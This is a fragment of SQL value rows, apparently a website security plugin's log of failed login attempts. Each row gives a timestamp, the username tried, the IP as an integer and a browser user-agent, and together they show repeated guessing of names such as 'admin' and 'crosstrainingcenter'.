(100275, 1495584571.974848, 1, 'loginFailInvalidUsername', 'outils', 0, 842969123, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100274, 1495584094.377546, 1, 'loginFailValidUsername', 'admin', 1, 3497113622, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100273, 1495583530.291845, 1, 'loginFailInvalidUsername', 'notre', 0, 3635199372, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100272, 1495583194.834223, 1, 'loginFailInvalidUsername', 'outils', 0, 842965149, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100271, 1495582480.402686, 1, 'loginFailValidUsername', 'admin', 1, 3163163411, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100270, 1495582000.072363, 1, 'loginFailInvalidUsername', 'center', 0, 1572433768, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100269, 1495581997.599903, 1, 'loginFailInvalidUsername', 'namur', 0, 1572433768, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100268, 1495581994.990733, 1, 'loginFailInvalidUsername', 'travail', 0, 1572433768, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100267, 1495581992.674968, 1, 'loginFailInvalidUsername', 'professionnel', 0, 1572433768, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100266, 1495581990.217263, 1, 'loginFailInvalidUsername', 'outils', 0, 1572433768, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100265, 1495581988.043489, 1, 'loginFailInvalidUsername', 'venez', 0, 1572433768, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100264, 1495581985.959511, 1, 'loginFailInvalidUsername', 'objectifs', 0, 1572433768, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100263, 1495581983.505079, 1, 'loginFailInvalidUsername', 'cross', 0, 1572433768, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100262, 1495581981.710126, 1, 'loginFailInvalidUsername', 'pour', 0, 1572433768, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100261, 1495581979.910324, 1, 'loginFailInvalidUsername', 'notre', 0, 1572433768, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100260, 1495489976.115695, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1936861289, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100259, 1495473240.468441, 1, 'loginFailInvalidUsername', 'notre', 0, 1495980045, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100258, 1495472562.870633, 1, 'loginFailInvalidUsername', 'outils', 0, 1729627112, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100257, 1495471953.538443, 1, 'loginFailValidUsername', 'admin', 1, 3237921028, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100256, 1495470988.786893, 1, 'loginFailInvalidUsername', 'notre', 0, 1833311020, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100255, 1495409637.751304, 1, 'loginFailValidUsername', 'admin', 1, 531267501, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100254, 1495409637.092013, 1, 'loginFailValidUsername', 'pablo', 3, 531267501, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100253, 1495409636.419797, 1, 'loginFailInvalidUsername', 'julie pierrard', 0, 531267501, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100252, 1495409635.759945, 1, 'loginFailValidUsername', 'julie', 2, 531267501, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100251, 1495409635.095922, 1, 'loginFailValidUsername', 'julie', 2, 531267501, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100250, 1495365040.503164, 1, 'loginFailInvalidUsername', 'outils', 0, 1741512757, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100249, 1495364451.694098, 1, 'loginFailValidUsername', 'admin', 1, 3586257058, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100248, 1495363943.738869, 1, 'loginFailInvalidUsername', 'notre', 0, 1168360410, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100247, 1495362812.578523, 1, 'loginFailInvalidUsername', 'outils', 0, 3280140082, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100245, 1495362457.919151, 1, 'loginFailInvalidUsername', 'outils', 0, 3105930270, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100246, 1495362457.976073, 1, 'loginFailInvalidUsername', 'outils', 0, 3476728705, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100244, 1495361935.401969, 1, 'loginFailValidUsername', 'admin', 1, 3497114222, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100243, 1495361453.182408, 1, 'loginFailInvalidUsername', 'notre', 0, 598138358, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100242, 1495360892.791027, 1, 'loginFailInvalidUsername', 'outils', 0, 1119841390, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100241, 1495340881.295965, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1586073137, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100240, 1495271338.656350, 1, 'loginFailInvalidUsername', 'outils', 0, 3056768804, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100239, 1495260583.100693, 1, 'loginFailValidUsername', 'admin', 1, 3497113622, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100238, 1495260232.935197, 1, 'loginFailInvalidUsername', 'notre', 0, 1079652533, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100237, 1495259647.512984, 1, 'loginFailInvalidUsername', 'outils', 0, 1053969232, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100236, 1495258796.362682, 1, 'loginFailValidUsername', 'admin', 1, 1168360410, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100235, 1495190438.042588, 1, 'loginFailValidUsername', 'admin', 1, 407574776, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100234, 1495190436.938204, 1, 'loginFailValidUsername', 'pablo', 3, 407574776, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100233, 1495190435.476249, 1, 'loginFailInvalidUsername', 'julie pierrard', 0, 407574776, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100232, 1495190434.158841, 1, 'loginFailValidUsername', 'julie', 2, 407574776, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100231, 1495190432.892130, 1, 'loginFailValidUsername', 'julie', 2, 407574776, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100230, 1495186790.323761, 1, 'loginFailValidUsername', 'admin', 1, 1434732386, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100229, 1495160513.507993, 1, 'loginFailValidUsername', 'admin', 1, 1539837019, 'Mozilla/5.0 (Windows NT 5.0; rv:52.54.01) Gecko/20142235 Firefox/52.54.01'),
(100228, 1495154264.888311, 1, 'loginFailValidUsername', 'admin', 1, 1539837019, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_23_85; rv:45.74.27) Gecko/20138607 Firefox/45.74.27'),
(100227, 1495148202.919062, 1, 'loginFailValidUsername', 'admin', 1, 1539837019, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.78.21) Gecko/20189638 Firefox/45.78.21'),
(100226, 1495096161.343910, 1, 'loginFailValidUsername', 'julie', 2, 3059525007, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100225, 1494974514.010111, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2970865452, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(100224, 1494974512.621905, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2970865452, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(100223, 1494973799.684300, 1, 'loginFailValidUsername', 'admin', 1, 3107039609, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100222, 1494888245.317491, 1, 'loginFailValidUsername', 'admin', 1, 95598307, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100221, 1494885335.727474, 1, 'loginFailValidUsername', 'julie', 2, 872392488, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100220, 1494856727.263816, 1, 'loginFailValidUsername', 'julie', 2, 3332038879, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100219, 1494839680.445506, 1, 'loginFailValidUsername', 'julie', 2, 1833429877, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100218, 1494829488.891922, 1, 'loginFailValidUsername', 'admin', 1, 3497117403, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100217, 1494828586.240561, 1, 'loginFailInvalidUsername', 'testing', 0, 1079652533, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100216, 1494828584.261604, 1, 'loginFailValidUsername', 'admin', 1, 1079652533, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99313, 1492882387.583650, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1410971013, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99312, 1492882386.610344, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1410971013, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99311, 1492881242.207047, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2170867155, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99310, 1492881240.995681, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2170867155, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99309, 1492879556.387142, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 784925211, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99308, 1492879555.177611, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 784925211, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99307, 1492879059.402398, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2835369459, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99306, 1492879056.565554, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2835369459, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99305, 1492874124.493678, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1066387086, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99304, 1492871360.516474, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3047364473, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99303, 1492871359.093938, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3047364473, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99302, 1492869604.164033, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 835553714, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99301, 1492864933.739667, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2631677661, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99300, 1492864932.299806, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2631677661, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99299, 1492863295.957793, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3418421947, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99298, 1492863294.782557, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3418421947, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99297, 1492863017.304037, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 627635047, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99296, 1492862199.103098, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3411509662, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99295, 1492862197.510862, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3411509662, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99294, 1492862126.228543, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1092736186, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99293, 1492862125.090797, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1092736186, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99292, 1492859206.326496, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2015149832, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99291, 1492859203.994163, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2015149826, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99290, 1492853978.310291, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3573333361, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99289, 1492853977.268088, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3573333361, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99288, 1492851898.034808, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 831654908, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99287, 1492851896.421933, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 831654908, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99286, 1492850840.273706, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3075697672, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99285, 1492850838.799261, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3075697672, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99284, 1492848356.736915, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1483800238, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99283, 1492847042.602013, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 989904714, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99282, 1492847040.834512, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 989904714, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99281, 1492846222.884101, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1741894664, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99280, 1492844337.938960, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 656969883, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99279, 1492844336.607330, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 656969883, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99278, 1492840903.021633, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 656634353, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99277, 1492834155.316643, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3356055950, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99276, 1492830946.434149, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3081456248, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99275, 1492825875.060991, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 531122319, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99274, 1492825873.616555, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 531122319, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99273, 1492821860.341696, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3075962410, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99272, 1492821858.958019, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3075962410, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99271, 1492818135.339360, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2704623375, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99270, 1492818134.375360, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2704623375, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99269, 1492807964.769873, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1705318576, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99268, 1492807962.954410, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1705318576, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99267, 1492807590.417119, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 835662335, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99266, 1492807589.237220, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 835662335, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99265, 1492802345.065609, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1372304315, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99264, 1492801813.763225, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3452436806, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99263, 1492800728.185220, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1014432263, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99262, 1492800726.581185, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1014432263, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99261, 1492797341.388229, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2954598475, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99260, 1492797340.326307, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2954598475, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99259, 1492795400.466536, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2015196739, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99258, 1492793737.033132, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1571925341, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99257, 1492793733.721767, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1571925341, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99256, 1492793232.508870, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 531877122, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99255, 1492793231.127808, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 531877122, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99254, 1492792509.867075, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3573226350, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99253, 1492792508.647512, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3573226350, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99252, 1492791695.070682, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1050879178, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99251, 1492788356.376939, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1513284388, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99250, 1492788355.313714, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1513284388, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99249, 1492787817.007719, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1489588377, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99248, 1492787815.540170, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1489588377, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99247, 1492783288.946626, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1741825768, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99246, 1492783287.633197, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1741825768, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99245, 1492777373.979524, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3065529464, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99244, 1492777372.550357, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3065529464, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99243, 1492776735.566521, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1729276347, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99242, 1492776659.218566, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3075658538, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99241, 1492773101.896052, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 18290519, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99240, 1492773099.987908, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 18290519, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99239, 1492768917.150578, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3314823674, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99238, 1492768914.065516, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3314823674, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99237, 1492767440.832306, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2945057184, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99236, 1492767439.109568, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2945057184, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
